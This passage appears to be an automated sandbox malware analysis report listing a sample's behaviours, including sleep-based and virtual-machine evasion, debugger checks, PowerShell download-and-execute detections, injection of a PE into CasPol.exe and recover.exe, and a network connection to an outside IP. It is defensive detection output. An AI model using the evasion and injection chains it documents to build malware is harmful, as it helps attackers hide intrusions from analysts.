Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

9_2_0040BAE3

Contains functionality to enumerate running services

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

8_2_0041A941

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3002	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6447	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 1830	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 7565	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: foregroundWindowGot 1769	Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\recover.exe

API coverage: 9.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1388	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1972	Thread sleep count: 264 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1972	Thread sleep time: -132000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep count: 1830 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep time: -5490000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep count: 7565 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep time: -22695000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4440	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4560	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	8_2_004090DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	8_2_0041C7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_0040B8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0044E989 FindFirstFileExA,	8_2_0044E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	8_2_00408CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_00419CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	8_2_00407EDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00406F13 FindFirstFileW,FindNextFileW,	8_2_00406F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10006580 FindFirstFileExA,	8_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040B477 FindFirstFileW,FindNextFileW,	9_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	10_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_00407357

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A8D8 memset,GetSystemInfo,

9_2_0041A8D8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware svga
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: name!vmware virtual s scsi disk device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware pointing device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware sata
Source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachineDetector
Source: wscript.exe, 00000003.00000002.1044412866.0000000002ABA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041666626.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041729244.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1044588740.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3467761348.000000000125E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2812724902.0000021A9505B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2812106156.0000021A8F82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: powershell.exe, 00000005.00000002.1078641425.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware vmci bus device
Source: powershell.exe, 00000005.00000002.1092014147.0000000007744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware sata{0} ({1})
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareU{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I = {8} }}
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware @\Dr
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware@\Dr
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware usb pointing device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware s
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Dr!vmware virtual s scsi disk device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware s@\Dr
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmtools
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype(
Source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: virtualmachinedetector

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\recover.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_0043B88D

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\recover.exe

9_2_0040BAE3

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

8_2_0041D0CF

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004438F4 mov eax, dword ptr fs:[00000030h]		8_2_004438F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10004AB4 mov eax, dword ptr fs:[00000030h]		8_2_10004AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,

8_2_00411999

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00435398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0043B88D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00434D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00434F01 SetUnhandledExceptionFilter,	8_2_00434F01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 23.186.113.60 443

Jump to behavior

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_6296.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6296.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

8_2_00418267

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 472000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47D000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: EB8008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 2FFC008	Jump to behavior
